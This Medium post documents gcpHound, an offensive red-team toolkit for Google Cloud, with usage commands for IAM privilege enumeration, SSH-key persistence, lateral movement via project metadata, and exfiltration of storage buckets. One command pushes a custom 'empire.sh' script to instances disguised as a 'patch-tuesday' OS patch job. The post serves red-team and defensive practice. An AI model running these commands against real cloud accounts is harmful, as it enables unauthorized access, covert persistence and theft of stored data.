gcpHound : A Swiss Army Knife Offensive Toolkit for Google Cloud Platform (GCP)

  • Enumerate path for Privilege Escalation
  • Multiple Persistence methods
  • Lateral Movement
  • Discovery and Collection for Google Cloud Storage (GCS) buckets
  • Exfiltrate GCS Buckets

GCP 101

A hypothetical domain using GCP is as shown in the image below.

GCP Heirarchy

Setup

Update 22nd August 2022 : Check out the latest version of gcpHound and added features in this article.
$ docker pull desijarvis/gcphound:v1.1-beta$ docker run --name gcpHound -it desijarvis/gcphound:v1.1-beta /bin/bashroot@<containerID># cd /root/gcpHound/root@<containerID># gcloud auth login --no-launch-browserroot@<containerID># gcloud config set project <project-id> 
gcpHound docker container

Highway to Privilege Escalation

orgGCPHound

Enumerates IAM pemissions of the organizations.

USAGE :$ ./gcpHound --orgGCPHound org1.redteam.com org2.redteam.com   (Make sure to use organization ID and not name of the organization)OR $ ./gcpHound --orgGCPHound  ( To Enumerate all organizations )

projectGCPHound

BUG UPDATE 16th October, 2021 : If gcpHound gets stuck while querying groups ( or during groupGCPHound function ) , you can take following action to resolve it.root@<containerID># gcloud beta identity groups search --labels=cloudidentity.googleapis.com/groups.discussion_forum --organization=org1.redteam.comroot@<containerID># gcloud identity groups memberships list --group-email=redteam-group1@redteam.com
USAGE : $ ./gcpHound --projectGCPHound redteam-project1 redteam-project2(Make sure to use project IDs and not project names)OR$ ./gcpHound --projectGCPHound ( To Enumerate all projects )

groupGCPHound

Enumerates all groups of all the organization and fetches members of those groups

USAGE :$ ./gcpHound --groupGCPHound redteam-group1@redteam.com redteam-group2@redteam.comOR$ ./gcpHound --groupGCPHound ( To Enumerate all groups )

runGCPHound

This function combine all three functions above. If you are not worried about making some noise , use this one.

USAGE :$ ./gcpHound --runGCPHound

enumPrivileges

This function analyzes the data collected from previous functions to find privileges of the user.

USAGE :$ ./gcpHound --enumPrivileges( this enumerates the privileges compromised user has ) OR $ ./gcpHound --enumPrivileges gcpadmin@redteam.com user@redteam.com redteam-group3@redteam.com( this enumerates privileges of desired users and / or groups )

Persistence

addNewComputeInstance

This function creates a new compute instance with public IP and adds the provided ssh public key to the instance.

USAGE :$ ./gcpHound addNewComputeInstance --instance redteam-instance-1 --zone us-central1-a --sshKeyFilePath ~.ssh/id_rsa.pub

addsshkeyComputeInstance

Adds sshkey to existing compute instance

USAGE :$ ./gcpHound addsshkeyComputeInstance --instance redteam-instance-2 --zone us-central1-a --sshKeyFilePath ~.ssh/id_rsa.pub

Lateral Movement

addsshkeyProjectMetadata

This function adds the ssh key project metadata which means you can ssh to all compute instances in the project ( except for the ones that block project wide metadata ssh keys ).

USAGE :$ ./gcpHound addsshkeyProjectMetadata --projectId redteam-project1 --sshKeyFilePath ~.ssh/id_rsa.pub

executeOSPatch

This function pushes a patch to desired compute instance with custom provided script.

USAGE :$ ./gcpHound executeOSPatch --instance redteam-instance-3 --zone us-central1-a --scriptFilePath empire.sh --jobname patch-tuesday

Discovery and Collection

This function discovers and collects paths for the GCS buckets.

USAGE :$ ./gcpHound --bucketLister redteam-project1 redteam-project2OR$ ./gcpHound --bucketLister ( To Enumerate Buckets for all projects )

Exfiltration

This function downloads the GCS buckets for a specific project OR all the projects.

USAGE :$ ./gcpHound --exfilGCSBuckets redteam-project1 redteam-project2OR$ ./gcpHound --exfilGCSBuckets ( To Exfiltrate Buckets for all projects )

Caveats

Execution of this functions depends on what privilege you have. The enumprivilege function should help you pinpoint your attacks to appropriate projects and organizations.

In The End

The different way Google Cloud permissions and features can be attacked is by no means limited to these functions .

CREDITS

This tool has been developed alongside Brad Richardson.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Madhav Bhatt

Madhav Bhatt

Effective collaboration between red and blue can produce offensive defense a.k.a blue team quickly detecting, responding and disrupting attackers activities.